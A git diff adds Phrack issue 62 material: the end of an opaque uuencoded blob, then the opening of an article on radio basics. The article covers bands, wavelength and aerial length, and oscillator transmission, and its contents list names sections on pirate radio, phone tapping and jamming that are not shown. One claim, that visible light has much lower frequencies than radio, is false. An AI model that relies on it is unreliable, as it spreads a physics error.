+M2<=R1U\H#EE$'<M]?J$X9)%U+/D,"L4AB[!C27Y0*`Y9I)U&0:<@%PY9Q)U&
+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
+<GJ?GZ7EZGIZGY^EY>IZ>I\=X_G^J=K^<`!@&````
+`
+end
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack62/11.txt b/phrack62/11.txt
new file mode 100644
index 0000000..9d9c2f5
--- /dev/null
+++ b/phrack62/11.txt
@@ -0,0 +1,1142 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3e, Phile #0x0b of 0x10
+
+|=---------------------=[ The basics of Radio ]=-------------------------=|
+|=-----------------------------------------------------------------------=|
+|=------------------=[ shaun2k2 <shaun at rsc dot cx>  ]=----------------=|
+
+0 - Introduction
+  0.1 - Technical Terms
+
+1 - Radio Basics
+  1.1 - Radio Waves
+  1.2 - Carrier
+  1.3 - (RF) Frequency Bands
+  1.4 - Wavelength
+  1.5 - Transmission
+  1.6 - Receiving
+
+2 - AM Radio
+  2.1 - What is AM Radio?
+  2.2 - Modulation
+  2.3 - Demodulation
+  2.4 - Circuits
+      2.4.1 - Receivers
+      2.4.2 - Transmitters
+
+3 - FM Radio
+  3.1 - What is FM radio?
+  3.2 - Modulation
+  3.3 - Demodulation
+  3.4 - Circuits
+
+4 - Misc
+  4.1 - Pirate Radio
+  4.2 - Wireless Telephone Tapping
+  4.3 - Jamming
+
+5 - Conclusion
+
+6 - Bibliography
+
+--[ 0 - Introduction
+
+    Ever since our discovery of radio, in around 1902, we have proceeded
+to utilise it for many different purposes -- from sending others short
+messages, to transmitting large and critical data sequences to other
+computer systems.  As time has gone on, as useful a technology as
+radio is, it is barely noticed anymore.  When most people think of
+'radio', they picture a small black device sitting in their car,
+which they will use to listen to their local radio stations during car
+journeys.  On the other hand, very few people realise the true
+usefullness of radio, often forgetting that their cellphones,
+televisions, satellite TV and alarm systems all too use radio to complete
+their task on a very regular medium -- radio is not just that boring
+old thing gathering dust in the corner.
+
+    This article is divided up into four parts.  The first part describes
+the basic theory of radio, and examples to illustrate some of the
+common day uses of it.  In parts two and three, AM and FM radio
+details are outlined showing various different circuits to illustrate
+how these principles can be applied to real-life, functioning
+circuits.  Section four is a misc. section, presenting some
+miscellaneous interesting points.  Some electronics knowledge is
+useful in radio, though not totally necessary.  Most circuits
+presented here are quite rough, and can be greatly improved upon in
+many ways.
+
+
+
+----[ 0.1 - Technical Terms
+
+Below is a description of technical terms used throughout the article:
+
+
+RF          -- Any frequency within the radio spectrum, which can be
+               used by to transmit and receive radio signals.
+
+Modulation  -- A technique used to package data into a radio signal
+               which is of use to the destination radio receiver.
+
+AM          -- Amplitude Modulation.  This involves shifting the amplitude
+               of a radio signal's carrier very slightly in sympathy with
+               a modulating signal.
+
+FM          -- Frequency Modulation.  FM modulation involves shifting the
+               frequency of a radio wave's carrier very slightly in
+               sympathy with a modulating signal.
+
+Receiver    -- Any device which is capable of receiving radio signals
+               sent by a radio transmitter.
+
+Transmitter -- A device which can transmit radio waves into the
+               surrounding environment.
+
+Aerial      -- A medium to large piece of wire which is used by either a
+               radio transmitter or receiver to propagate or detect an
+               incoming radio signal.  In a radio receiver or transmitter,
+               an aerial acts as one plate of a capacitor, whilst the other
+               plate is taken place by the Earth.
+
+Antenna     -- See aerial.
+
+Wireless    -- Refers to any technology which communicates data without the
+               need for a wired connection.  Most wireless devices, such as
+               cell phones, televisions, and others use radio, but several
+               do use technologies such as infrared, which is not covered
+               here.
+
+Radio wave   -- A radio wave is an 'electromagnetic' wave, most commonly
+                containing data to be received by a remote radio receiver.
+
+Oscillator   -- Refers to an electronic circuit which 'oscillates', or
+                'vibrates', to complete a certain task.  Oscillators are
+                used in radio to transmit radio waves at a given
+                frequency -- the rate at which the oscillator oscillates is
+                the RF (see RF) at which the wave is transmitted.  Common
+                oscillator circuits, also used in this paper, are LC
+                oscillator circuits, and crystal-controlled oscillators.
+
+Crystal-controlled
+oscillator   -- An oscillator circuit whos oscillation frequency is
+                controlled by a 'crystal'. See oscillator.
+
+LCoscillator -- An oscillator consisting of a capacitor and an inductor,
+                whos frequency of oscillation is controlled directly by the
+                capacitor, which is usually variable.  See oscillator.
+
+Capacitor    -- Device which stores current as an electrical field.
+
+Broadcast    -- A term used to describe transmitting radio waves into the
+                atmosphere.
+
+Wavelength   -- The physical distance between two waves on the same
+                frequency, transmitted successively.
+
+Bands        -- Frequency Bands are a range of frequencies used
+                interchangeably or commonly for the same type of technology.
+                For example, televisions often use the VHF band.
+
+Frequency    -- Number of cycles per seconds. Frequency can be used to
+                describe how often an oscillator oscillates.
+
+Sidebands    -- When modulation of a carrier is applied, two extra
+                bands are generated, both slightly higher and lower 
+                than the carrier frequency, equating from the 'sum and 
+                difference' of the carrier and audio
+                frequency.  These two bands appear at either end of
+                the RF carrier, hence the term 'sidebands'. 
+ 
+
+--[ 1 - Radio Basics
+
+----[ 1.1 -  Radio Waves
+
+    Radio waves, otherwise referred to as 'radio signals', are simply
+electromagnetic waves.  Radio waves are transmitted by devices called
+'radio transmitters' or 'transmitters' for short.  Despite our wide and
+many uses for radio waves as a whole, we actually known very little about
+'radio'.  We do know, however, that radio waves are a form of energy, which
+act exactly like they have been propagated as any other type of wave we
+know of. For example, an audio wave.
+
+    Radio waves are made up of three things; an electric field, a
+direction, and a magnetic field.
+
+    Despite our underlying ignorance of radio and its properties, we can
+predict and use its properties to our advantage to undergo a wide variety
+of different tasks -- and will probably do so for a long time to come.
+
+
+----[ 1.2 - Carrier
+
+    An 'RF carrier' can be thought of as the part of the radio wave which
+can be modulated to 'carry' a data signal. An analogy to help with
+understanding this is to think of turning on a flashlight and pointing it
+towards a wall.  The light which is seen on the wall is the 'carrier'.
+
+    Before and without modulation, the carrier of a radio wave contains no
+data, and just contains peaks of an RF voltage.
+
+                          peak voltage
+
+                       ||\\    ///\    //\\
+                       || \\  //  \\  //  \\
+                       ||  \\\/    \\\/    \\
+
+                             RF carrier
+
+
+    Because sending radio waves with a carrier containing no data would be
+almost useless, a carrier is 'modulated' to contain data. There are various
+modulation schemes in wide use, but the two most common schemes are AM
+(Amplitude Modulation) and FM (Frequency Modulation). These are discussed
+later.
+
+
+----[ 1.3 - (RF) Frequency Bands
+
+    As we can gather from listening to a variety of radio stations,
+different forms of technology use an entirely different 'band' of radio
+frequencies on which to send and receive their radio signals.
+
+    The entire range in which radio signals are transmitted extends from
+around 30KHz, up to about 30GHz.  This whole range of available RFs
+(Radio Frequencies) is known as the 'radio spectrum'.  The radio
+spectrum's range of frequencies, and their concurrent uses are shown
+in the below table.
+
++-------------------+----------------------------+---------------------+
+| Frequency         | Uses                       | Name                |
++-------------------+----------------------------+---------------------+
+| 30KHz-300KHz      |   Long-wave radio, useful  | Low Frequency (L.F) |
+|                   |   for long distance        |                     |
+|                   |   communications           |                     |
++-------------------+----------------------------+---------------------+
+| 300KHz-3MHz       |   Medium wave, local radio | Medium Freq (M.F)   |
+|                   |   distant radio stations   |                     |
++-------------------+----------------------------+---------------------+
+| 3MHz-30MHz        |   Short wave radio         |  High (H.F)         |
+|                   |   Communications           |                     |
+|                   |   Amateur radio            |                     |
++-------------------+----------------------------+---------------------+
+| 30MHz-300MHz      |   FM Radio                 |  Very High (V.H.F)  |
+|                   |   Police radio             |                     |
+|                   |   Meteorology Comms        |                     |
++-------------------+----------------------------+---------------------+
+| 300MHz-3GHz       |   Air Traffic Control      |  Ultra High (U.H.F) |
+|                   |   TV                       |                     |
++-------------------+----------------------------+---------------------+
+| 3GHz-30GHz        |   Radar Comms              |  Microwaves (S.H.F) |
+|                   |   Satellites               |                     |
+|                   |   Telecommunications (TV & |                     |
+|                   |   telephone)               |                     |
++-------------------+----------------------------+---------------------+
+
+
+    Since certain frequency bands are used to accomodate important
+communications, such as the VHF band, it became illegal to transmit
+radio waves at certain frequencies without a license. It was made so
+because transmission of radio signals at important frequencies could
+interrupt critical communication, such as communication between police
+officers with their radio transmitter devices.
+
+    All frequencies within the radio spectrum are invisible to humans.
+Light frequencies which are visible to humans, i.e frequencies which
+are present in the light spectrum, operate at *much* lower
+frequencies.
+
+
+----[ 1.4 - Wavelength
+
+    Wavelength is the physical distance between a peak in one radio wave,
+to the peak in another radio wave transmitted successively -- on the same
+RF.  As a general analogy, the wavelength can be thought of as the distance
+that the peak in a given wave will have travelled in the space of time for
+one cycle. This can be calculated using the below simple formula.
+
+|\ = V / F
+
+* |\ = lamda
+  V  = Velocity
+  F  = Frequency
+
+    Using this formula, the wavelength for an example scenario can be
+calculated, when the RF is 27MHz.  The speed of light is 300 million
+meters/second, which is therefore the velocity of the electromagnetic
+wave.
+
+|\ = 300,000,000 / 27,000,000
+
+= 11.11r
+
+    Looking at the above calculation, what can be gained? It seems that the
+wavelength for waves transmitted in the example scenario is 11.11
+(recurring) meters, so from this, it can be gathered that a peak in a
+particular radio wave will have travelled 11.11r meters in the time it
+took for one oscillation of the transmitting oscillator. But how can we
+know how long this oscillation period takes? We can calculate this
+using the formula '1 / f'.
+
+1 / 27,000,000 = 0.0000000370r
+
+    This means that within the miniscule time frame of 0.0000000370
+(recurring) seconds, the peak within the radio wave should have travelled
+approximately 11.11 (recurring) meters.
+
+    Wavelength might seem quite a useless thing to calculate on its own,
+but it comes in very useful when it comes to calculating suitable aerial
+lengths for both radio transmitters and radio receivers. As a rule of
+thumb, an ideal length for a radio aerial is around 1/2 of the signals
+wavelength. This can be calculated very easily.
+
+11.11 / 2 = 5.555 (roughly)
+
+    From this calculation, we can gain the knowledge that a near ideal
+radio transmitter/receiver aerial can be constructed to be of around 5.5
+meters. Exact precision is not generally critical to the overall operation
+of the radio transmitter/receiver. For example, where portability of
+equipment is more of a concern than great efficiency, 1/4, 1/8 or even 1/16
+of the wavelength in meters is often used for the length of the radio aerial.
+
+11.11 / 4 = 2.7775
+11.11 / 8 = 1.38875
+11.11 / 16 = 0.694375
+
+    From this little experiment we can see that we can turn a length which
+is considerably out of question due to portability desires, into a length
+which is much more suitable, yet efficiency is not affected too much.
+
+    This technique is very commonly employed to calculate sensible lengths
+for radio aerials.  However, other techniques are also employed, especially
+in the case of satillite TV.  Notice how TV satillite dishes house tiny
+holes in the body of the dish? These holes are specially sized to ensure
+that radio waves with wavelengths less than that associated with the
+desired RFs (3GHz-30GHz) do not create an electrical current in the aerial
+wire, as suitable radio waves do. Holes based upon the same principle can
+also be found when looking inside a microwave oven.
+
+----[ 1.5 - Transmission
+
+    Perhaps one of the most difficult concepts to grasp in radio is how
+radio waves are actually broadcast into the environment. As touched upon
+previously, radio waves are transmitted using oscillators in electronic
+circuits, and the rate at which the oscillator oscillates is the frequency
+at which the radio waves are transmitted.
+
+    As an example, we will focus on using an LC tuned oscillator circuit in
+the radio transmitter circuit.  LC oscillators are made up of an inductor
+(L), and a capacitor (C).  If we consider how a capacitor stores current,
+we can come up with the conclusion that it is stored as an electric field
+between two plates -- these two plates make up the capacitor. During one
+oscillation (also known as a 'cycle') of the LC tuned circuit, all
+available current is stored first in the capacitor as an electric field,
+and then as a magnetic field associated with the LC circuit's inductor. 
+After a *very* short time period (1/f), the magnetic field is turned back
+into an electrical current, and begins to recharge the capacitor again. 
+Because the inductor's magnetic field is beginning to change back into
+electrical charge, the inductor turns another electrical field into a
+magnetic field in order to counter-act the change. This continuous cycle of
+quick changes keeps the current in the LC circuit flowing in the same
+direction, driven by the current stored in the inductor. When the
+inductor's charge eventually becomes zero, the capacitor becomes charged
+again, but with the opposite polarity. After each oscillation (cycle),
+energy loss has occured, but not all of the energy loss can be accounted
+for as energy lost as heat from the inductor's coil. Thus, we can gather
+that some energy has been 'leaked' from between the capacitor's plates, as
+electromagnetic energy -- radio waves.
+
+    If we consider this, we can conclude that the further apart the plates
+in the capacitor are, the more energy is broadcast ('leaked') as radio
+waves.  This must mean that if we have a capacitor with plates spaced
+1 meter apart, more energy will be broadcast as radio waves than if the
+capacitor had plates spaced a very small distant apart. By thinking even
+deeper, we can conclude that to maximise 'leakage' of radio energy, a
+capacitor is needed in the LC tuned oscillator circuit with plates spaced
